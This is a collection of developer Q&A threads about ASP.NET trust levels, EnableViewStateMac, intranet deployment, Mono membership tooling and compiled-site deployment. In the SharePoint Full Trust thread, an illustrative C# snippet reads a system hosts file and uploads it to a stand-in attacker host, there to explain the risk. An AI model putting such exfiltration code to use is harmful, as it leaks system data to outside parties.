I'm currently buying web hosting on a shared server that uses IIS 6 and ASP.NET 2.0 (they advertise 3.5, but investigation on my part has proven this to be false).
I did some legwork to make my 3.5-dependent ASP.NET apps compile on my hosting, then discovered another problem: my apps fail at File.Open() calls because they have no FileIOPermission.
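To illustrate, the failing pattern is essentially this (the path and file name are just examples):

    // In a page's code-behind (using System.IO):
    string path = Server.MapPath("~/App_Data/settings.txt"); // example path
    try
    {
        using (FileStream fs = File.Open(path, FileMode.Open, FileAccess.Read))
        {
            // ... read the file ...
        }
    }
    catch (System.Security.SecurityException)
    {
        // This is what I'm hitting: the CLR rejects the FileIOPermission
        // demand under the host's partial-trust policy before the file is
        // ever touched. It's not a file-not-found problem.
    }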
I've called technical support, and they've advised me this permission is only available if I configure IIS 6 to use .NET 1.1 only. Am I out of line in thinking this is just not good enough?
This is something that should have been nutted out before starting to pay them, unless this disk access is a new requirement.
I can see it from their point of view. Every extra bit of power your apps have gives you more ability to shoot yourself (and more importantly, them) in the foot.
But I don't know why they'd allow it for an earlier .NET version, that seems bizarre.
I would make it clear that this is a deal-breaker. They might capitulate, or you may have to move elsewhere. Either way, your problem will be solved.
After a lot of reading about EnableViewStateMac and the possibility that it will be removed in future versions of the .NET Framework, I still wonder why it is even an option to set it to false.
I understand you should NEVER set it to false, but who decided to create the option in the first place? And if someone really thought it through, why would anyone set it to false at all?
Why would you have an option to enable insecurity?
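For reference, this is the switch I mean - it can be set per page or site-wide (please don't actually do this):

    <%@ Page Language="C#" EnableViewStateMac="false" %>

    <!-- or for the whole site, in web.config under <system.web>: -->
    <pages enableViewStateMac="false" />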
This switch was created long before I joined the ASP.NET team, but I was curious about this myself and spent some time spelunking through the old bug database. As far as I can tell, there are two main reasons it was introduced.
The switch was seen as potentially offering a performance benefit. In an early preview of the .NET Framework (1.0 alpha, really), computing the MAC was indeed slow. This was fixed before 1.0 reached RTM, so the performance difference became negligible. However, the damage was done: the seed was planted in early developers' minds that there might be some cases where, for performance's sake, the MAC needs to be disabled. This also led to a bunch of MSDN articles that suggested disabling the MAC improves performance, and I'm still (in 2014!) finding and removing these articles.
In a web farm environment, the <machineKey> needs to be synced. Unfortunately we don't make it easy to generate machine keys securely. So, in the early days of ASP.NET testing, the switch existed to allow testers to do the simple thing for farm deployments rather than the right thing for farm deployments. We're still battling this today, too: most developers use online machine key generators, which are insecure. I'm working with the Visual Studio team to make generating and securing machine keys easier.
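A safer alternative to an online generator is to produce the key material yourself from a cryptographic RNG. A minimal sketch (the key lengths are illustrative; match them to your chosen validation and decryption algorithms):

    using System;
    using System.Security.Cryptography;

    static class MachineKeyHelper
    {
        // Returns hex-encoded random bytes suitable for the validationKey /
        // decryptionKey attributes of <machineKey>, which you would then
        // copy into web.config on every server in the farm.
        public static string GenerateKey(int byteLength)
        {
            byte[] buffer = new byte[byteLength];
            using (var rng = new RNGCryptoServiceProvider())
            {
                rng.GetBytes(buffer);
            }
            return BitConverter.ToString(buffer).Replace("-", "");
        }
    }

    // e.g. GenerateKey(64) for validationKey, GenerateKey(32) for decryptionKey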
At the time, it was believed that the worst possible thing that could happen if the MAC was disabled is that you could XSS the site. This turned out to be an incorrect assessment.
Finally, its removal is no longer just a possibility. It has already been removed in our local source repositories. The next .NET Framework update that we blast out onto the world will have this payload in it, but I don't have timelines for when that might be. We're just sitting on the trigger waiting for the go-ahead. :)
Back in the classic ASP days, an HTML page was often posted to a separate .asp page, which was a completely different page. A similar coding pattern is now termed cross-page posting. ViewState is specific to a page, so if you post one ASP.NET page to another, the ViewState won't match. In that situation, if you have EnableViewStateMac on (meaning you want to verify the integrity of the ViewState), validation fails and causes an error. So people would disable ViewStateMac so they could keep programming the old way, and Microsoft continued to provide the option to support legacy code.
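For what it's worth, ASP.NET 2.0 added a supported form of cross-page posting (the PostBackUrl property plus PreviousPage) that doesn't require disabling the MAC. Roughly (the control names here are made up):

    // On the target page's code-behind. The source page posted here via
    // <asp:Button PostBackUrl="~/Target.aspx" ... />.
    protected void Page_Load(object sender, EventArgs e)
    {
        if (PreviousPage != null)
        {
            // "TextBox1" is a hypothetical control on the source page.
            TextBox source = (TextBox)PreviousPage.FindControl("TextBox1");
            if (source != null)
            {
                Label1.Text = source.Text; // "Label1" lives on this page
            }
        }
    }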
But as you already mentioned, this is a huge security risk that opens your application up to all kinds of attacks.
platform: ASP.NET 4.5, MVC 4, C#
I'm currently designing a website that will be publicly available on the Internet. However, a meaningful percentage of my target market would be uncomfortable putting some information on a public site, even if it's served over HTTPS, etc.
What I'd like to be able to do is let corporate users use my site, and one way to do that is to let them host my website on their intranet. The usual disadvantages are, of course, that their site won't be updated as fast as the public one, and it's also a headache for me in terms of support.
My questions are:
What are some strategies to make "corporate friendly" deployments easy and hassle-free?
Are there ways I could keep the site public with just the database inside the intranet (can't see how... but then I'm no techno-know-all)
If I have no choice but to make it locally hosted - then what's the best way to do it to keep my development/support overheads at a minimum?
I hope the mods don't lock this. I'm asking for specific methods and technical approaches to a very real problem.
Thank you,
For #1, there are many facets to the question. A couple of thoughts that might help you think it out:
Deploying your app: Make it simple to deploy, and to upgrade between versions of your application. Try to make it happen as a single operation, not by upgrading different parts by hand. As Darin Dimitrov mentioned, you could look into a technology like Web Deployment Packages, especially with Visual Studio 2012, which will have incremental database publishing (in VS2010, database publishing was non-incremental, so there wasn't really an "update" story). Keep the cost of deployment down so that customers can afford to upgrade more frequently (not the cost of your product, but the overhead of whoever is paid to keep the system updated and running).
Consider differences between running on the Internet and on an intranet: For example, authentication on the Internet is usually done with forms-based authentication. On an intranet, you may want to consider supporting Windows authentication for a seamless login experience for corporate users. This should influence your design so that authentication is modular between your deployments (see the sketch after this list).
Corporate adoption of newer technologies might be slower than you want: You're using the latest and greatest (ASP.NET 4.5/MVC4). Some companies might not be prepared to deploy this now, or for a couple years. Consider if you could use an older, established technology, such as .NET 4 - having been out for a few years, it's already somewhat proven and has adoption.
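Here's the kind of seam I mean for the authentication point above - a sketch only, with made-up names, not a prescribed API:

    using System.Security.Principal;

    // Both deployments hand you an IPrincipal; the difference is how its
    // name maps to one of your application's users.
    public interface IUserResolver
    {
        string ResolveUserName(IPrincipal principal);
    }

    // Public/Internet deployment: forms authentication, the identity name
    // is the login name as-is.
    public class FormsUserResolver : IUserResolver
    {
        public string ResolveUserName(IPrincipal principal)
        {
            return principal.Identity.Name;
        }
    }

    // Intranet deployment: Windows authentication, names arrive as
    // DOMAIN\user, so strip the domain before matching your user table.
    public class WindowsUserResolver : IUserResolver
    {
        public string ResolveUserName(IPrincipal principal)
        {
            string name = principal.Identity.Name;
            int slash = name.IndexOf('\\');
            return slash >= 0 ? name.Substring(slash + 1) : name;
        }
    }

Pick the implementation at startup (e.g., from a config setting or your IoC container), and the rest of the app never needs to care which deployment it's running in.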
For your 2nd question, it comes down to what their IT is willing to accommodate. Many corporate sites have the database within a secured LAN, but the web server is accessible from the public Internet. It's certainly a well-understood network design, but depending on the assets involved in your application, your customers may or may not agree to it. This one's a business decision.
For #3, the answer is common to any long-term software project. It has to be high quality and maintainable if you want to minimize the hassle.
If you're only going to support the last N versions, make that very clear. Avoid supporting code that you already fixed long ago. Consider providing extra support or affordable upgrades to keep your customers on newer (and hopefully better) releases.
Keep in mind what components need to be upgraded between versions. Your web app (obviously), but also your database schema and any dependencies or libraries you're using. This is mostly the same considerations as #1. Make sure you have a good plan for upgrades and rollbacks.
Most importantly, test, test, test. Have functional regression tests and install/upgrade tests, and try out as many possibilities as you can think of.
This answers only #1 above.
I would recommend a continuous integration tool. We use TeamCity and deploy MVC 3 and MVC 4 applications to our public as well as privately hosted sites with the click of a button. Previously we used CruiseControl, but we're more satisfied with TeamCity. Read up on them; it might lead you in the right direction.
You may want to check out Visual Studio's Web Deployment Packages. They allow you to prepare a package that can be installed directly on your clients' web servers.
Does anyone know how to get the authentication mechanism configured with the Web Site Administration Tool working under Mono on Linux? Is it even possible?
I don't think you're going to find a ton of support for this, as evidenced by the lack of activity on your question. The Web Site Administration Tool was removed from CodePlex around April 2009 due to inactivity (CodePlex rules state it must be an ongoing project, with no "abandoned" projects), and its use/adoption really declined. Many projects that were using it as a component just wrote their own after that.
There have been a few alternatives that have popped up in the community after it went missing:
Rolling Your Own Website Administration Tool
Create Your Own Web Site Administration Tool in ASP.NET
I think using code from one of those two projects will come as close to what you're after as is available. It's not ideal, and it will require some work to get it working with the back ends you want (both of those use a SQL Server back end). I know this answer sucks, but sometimes that's the answer. I hope someone comes along and proves me wrong, showing that what you want is out there, or at least provides the WSAT source code as it last stood on CodePlex... that'd be a huge head start in getting it to run.
If you're referring to a different WSAT, please comment and correct me... it's such a generic term, really, but that was by far the most popular one, so I based this answer on it.
You have to set up your database schema manually for Membership/Roles support if you're using Mono. That said, following the FAQ answer (which I have found very handy in the past) alone may not be enough; I am not sure about the other dependencies of the Web Site Administration Tool itself (e.g., any .NET-specific libraries it needs), but combined with an appropriate membership provider configured in system.web, I'd say there is a reasonable chance it may work.
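By "an appropriate membership provider" I mean something along these lines in web.config - the connection string name here is a placeholder for your own:

    <system.web>
      <membership defaultProvider="SqlProvider">
        <providers>
          <clear />
          <add name="SqlProvider"
               type="System.Web.Security.SqlMembershipProvider"
               connectionStringName="MembershipDb"
               applicationName="/" />
        </providers>
      </membership>
    </system.web>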
If that doesn't work for you, I would second Nick's suggestion of taking a look at the solution from 4GuysFromRolla.com, who have a lot of good info relevant to both .NET and Mono.
I have looked through the related questions, and none of them have provided me the information I am looking for.
Currently the team I work on deploys individual .aspx (and .aspx.vb) files for bug fixes/enhancements. I am trying to effect change, as I really believe that deploying the whole compiled site is less error-prone. As this is a significant change from the way things have been done, my suggestions have been met with significant resistance.
As my google-fu has not been up to par lately, I was hoping the SO community could either tell me that I am off my rocker and there is nothing wrong with moving individual files, or point me to some really good resources that would let me make a stronger case.
Edit:
This has all been great info and reinforces the arguments I have already been making. Can anyone argue the other side?
Deploying individual files for bug fixes and enhancements is not a wise strategy. It sounds like you need a comprehensive build and deployment process. That doesn't mean it has to be complicated, as there are some good tools available nowadays.
Build and deployment can get detailed, so as a minimum start, take a look at the Microsoft Web Deployment Tool (http://www.iis.net/extensions/WebDeploymentTool). Install the tool on your build server and on your deployment server. Stage your ASP.NET content locally using the Visual Studio Publish command, then use the tool to synchronize the entire package onto the deployment server. I like this approach because it can be completely automated. When doing builds and deployments, aim for complete automation to reduce potential errors.
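As a rough example of the synchronize step (the server name and package path are placeholders):

    msdeploy.exe -verb:sync ^
        -source:package="C:\build\MySite.zip" ^
        -dest:auto,computerName="DeployServer01"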
This is the bare minimum, but you will at least be certain that when specific files are changed, they are ALL synchronized on the deployment server.
Personally, the ability to roll back immediately is what matters most to me, and web site projects are very hard when it comes to tracking changes.
You can find a good, detailed comparison here; I am reproducing the article below.
1) Deployment. If you need in-place deployment, this model is perfect. However, it's not recommended, since you are exposing your logic in clear text: anybody who has access to the physical server can mess with your code, and you'll never notice. You can try to precompile the web site, but you'll end up with a lot of DLLs and almost untouchable .aspx files. Microsoft recognized this limitation and released the Web Deployment Project tool.
2) You need to keep track of what you changed locally and what you uploaded to the production server. There is no version control. Visual Studio has a Web Copy tool, but it fails to help. I had to build my own tool that kept track of changes based on Visual SourceSafe.
3) When you hit F5 for debug execution, it takes a good 2 minutes to compile and execute the whole project. You can, of course, attach the debugger to an existing thread, but that's not an obvious solution.
4) If you ever try to generate controls on the fly, you will hit the first unsolvable limitation: how to reference other pages and controls. Page and control compilation happens on a per-directory basis. In the best case you get an assembly per directory; in the worst, each page or control gets its own assembly. If you need to reference another page from a control or from another page, you have to explicitly import it with the @Reference directive.
So for,
customControl = this.LoadControl("~/Controls/CustomUserControl.ascx") as CustomUserControl;
You need an @Reference directive, roughly like this (the type name below is the auto-generated one, and its exact form depends on your folder structure):
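    <%@ Reference Control="~/Controls/CustomUserControl.ascx" %>

    customControl = this.LoadControl("~/Controls/CustomUserControl.ascx") as ASP.controls_customusercontrol_ascx;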
But what if you want to add something truly dynamic and can't put in all the appropriate @Reference directives? Or what if you're creating a server control, which has no .ascx file, so there's no place for an @Reference directive? And since each control gets its own assembly, it's almost impossible to do reflection.
Web Application Projects, which reappeared in Visual Studio 2005 SP1, solve all the issues mentioned above.
1) Deployment. You get just one DLL per project. You can create redistributable packages and repeatable builds. You can have versioning and build scripts.
2) If you change code-behind, you can upload just the one DLL. If you change an .aspx page, you can upload just that .aspx file.
3) Execution takes 2-3 seconds at most.
4) The whole project is in one assembly, which makes it easy to reference any page or control. Conclusion: for any kind of serious work, you should use Web Application Projects. Special thanks to Rick Strahl for his amazing article Compilation and Deployment in ASP.NET 2.0.
I agree with Rich.
Further information:
Deploying your SOURCE code, i.e. the .vb files, to the server is a BAD idea. Compile it. Obfuscate if you can; just don't deploy straight source. Imagine an attacker who gains access to the system: they could easily change your code, and you might never notice. Yes, you can use a tool like Reflector to decompile compiled code, but it's really hard to decompile a full site, make the changes you want, and put it back into production.
Deploying a single file might very well cause some type of problem in a related module. I'm guessing you guys don't really do QA. Tell them it's time to grow up.
Compiling your site ahead of time will reduce JIT (just-in-time) compilation at runtime. Think performance.
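For example, you can precompile with the aspnet_compiler tool that ships with the framework (the paths here are placeholders):

    aspnet_compiler -v /MySite -p C:\source\MySite C:\build\MySitePrecompiled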
I'm also going to guess that pretty much everyone has production server access. This is bad from the company's perspective as you have no controls in place. What happens when an employee decides to cause some havoc before leaving?
What you are describing is in line with cowboy coding. Sure, it's fun to ride to the rescue, but this style frequently blows everything up.
It's bad for rolling back. If you deploy as a web site rather than a web app, sure, you can do quick patches of one or two files, but what if you ever need to roll back to a previous version? Good luck tracking down all the files that were updated to make the new version. I much prefer the concept of a "version" for organizational reasons, and the compiled web app is much more in line with this than a "website" project.
We had this dilemma and ended up going with the compiled version, mainly for security reasons. If your site is external-facing, you could be compromising your security by allowing the .vb files to sit out there in plain text. I realize someone could still get your code if they really wanted to, but it would be an additional hurdle for them to clear.

If you use Visual Studio as your development environment, you can publish the site precompiled and check the named-assemblies option when publishing; this essentially creates a DLL for each .aspx page, so you can still do one-off page changes if necessary. This was a great feature for us, because we were constantly updating the whole site, and there were times when things got updated that shouldn't have. After using that feature, we no longer had updates pushed that shouldn't have been. As far as rolling back, I hope you're using some type of source control/versioning system. Team Foundation Server is great for versioning/source control, but it is quite pricey.
What is the best deployment strategy depends a lot on what kind of environment you are working in, and what kind of developers you are working with.
Visual artists who started with graphic layout and worked their way toward programming are much more in tune with individual page generation and release. Also, the .aspx.vb files are simply server-side scripting, not really programming.
Programmers usually start at the command line and branch out to environments such as the web, and understandably feel that good programming practices should be applied to the web too, including standard test and release cycles (and compiled code).
If the site is in constant flux, individual pages make more sense, but if you are required to deliver an installation package to your production group, MSI files are the way to go, since they can easily be backed out if necessary.
If you evaluate your group's needs, including the varied experience of everyone in the group, you should be able to convince either yourself or the group. This is not a matter of which is better, but of which provides the best business model.
I recently joined a firm and when analyzing their environment I noticed that the SharePoint web.config had the trust level set to Full. I know this is an absolutely terrible practice and was hoping the stackoverflow community could help me outline the flaws in this decision.
Oh, it appears this decision was made to allow the developers to deploy DLLs to the bin folder without creating CAS policies. Sigh.
Just to clarify, and to make matters worse: we are also deploying third-party code to this web application.
Todd,
The book, "Programming Microsoft ASP.Net 3.5", by Dino Espisito provides some sound reasoning for not allowing Full Trust in ASP.Net applications.
Among other reasons, Dino states that web applications exposed to the internet are "one of the most hostile environments for computer security you can imagine." And:
"a publicly exposed fully trusted application is a potential platform for hackers to launch attacks. The less an application is trusted, the more secure that application happens to be."
I'm surprised the StackOverflow community did not outline the problem with Full Trust better. I was hoping for the same thing so I didn't have to go digging through my pile of books to find the answer, lazy me.
If they're ignoring the CAS policies, it might be a tough sell to get them to dial it back, since it makes their jobs a little harder (or, at least, a little less forgiving). Changing security practices is always tough - like when I had to convince my boss that using the sa account in the SQL connection strings of our web applications was a bad idea - but hang in there.
Full Trust allows the application to escalate to control of any resource on the computer. You'd have to have a security flaw in your application to allow that, and they'll probably claim they've prevented any escalation through astute programming, but remind them: if something does happen, wouldn't they rather the web application didn't have control of the whole computer? Just in case?
EDIT: I was a little overzealous with my language here. Full Trust would allow the application to control whatever it wants, but only if the application pool process has sufficient rights to do so. So if you're running as a limited user with no rights on the server beyond what the application needs, then I suppose there's essentially no risk in "Full Trust". In reality, though, the app pool owner most likely has a number of rights you wouldn't want your app to have (and in some cases many, many more), so it's much safer to limit app security and grant the additional rights the application needs individually. Thanks for the correction, Barry.
Flaws? Many. But the most damning thing is straight out of the CAS utility:
"...it allows full access to your computer's resources such as the file system or network access, potentially operating outside the control of the security system."
That means code granted Full Trust can execute any other piece of code (managed or otherwise) on the system, can call across the network to any machine, and can do anything in the file system (including changing permissions on restricted files - even OS files).
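To make that concrete, under Full Trust code like the following runs without complaint; under Medium Trust each step throws a SecurityException, because FileIOPermission is scoped to the application directory and WebPermission to configured hosts (the URL is obviously made up):

    using System.IO;
    using System.Net;

    // Read a file well outside the web application's folder...
    string hosts = File.ReadAllText(@"C:\Windows\System32\drivers\etc\hosts");

    // ...and ship it off to an arbitrary host on the network.
    using (var client = new WebClient())
    {
        client.UploadString("http://attacker.example/collect", hosts);
    }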
Most web programmers would say "that's not a problem, it's just my code," which is fine... until a security flaw crops up in their code that allows an attacker to make it do unsavoury things. Then previously granted Full Trust becomes quite unfortunate.
Honestly, I have found SharePoint to be too restrictive.
Take a look at the following page to see what can and cannot be done based on trust levels
http://msdn.microsoft.com/en-us/library/ms916855.aspx
One problem I ran into immediately was that I could not use the Caching Application Block. We were using this application block instead of ASP.NET caching because we had used an MVP pattern and might open up a WinForms application later.
Another problem is that reflection isn't allowed; this caused our About page to fail, because the version number is pulled from the assembly's metadata.
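The offending call was of this shape - ordinary-looking code that needs more permissions than a restrictive trust level grants:

    using System.Reflection;

    public static string GetProductVersion()
    {
        // Pulls the version from the assembly's metadata. Under a
        // restrictive trust level this throws SecurityException rather
        // than returning the version - which is what broke the About page.
        return Assembly.GetExecutingAssembly().GetName().Version.ToString();
    }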
I think the best solution is not to use SharePoint as an application host. I would only use SharePoint as an application host if the amount of coding were so small that it didn't affect the trust level, and if it would be less work than setting up a new application. If the code you're writing is starting to hit the walls of the trust level, move your application into a proper ASP.NET environment. But that's just me, and I am biased. Maybe you should aim for a Medium trust level as a compromise.
I use Full Trust on my development machines so I can deploy to the bin folder when building new code.
I trust my own code, and I run it from the GAC in production, because creating CAS policies is a pain.
The third-party thing would have me worried, too; however:
Most third-party solutions found on the web also deploy to the GAC (presumably for the same reasons). This gives them full rights regardless of trust level.
It feels like it comes down to whether you trust the third parties - and do you really trust your own developers?
What would a hacker do?
The scenario where a hacker drops an evil DLL into your bin folder doesn't strike me as very realistic; regardless, if he can do that, he can probably also change the trust level.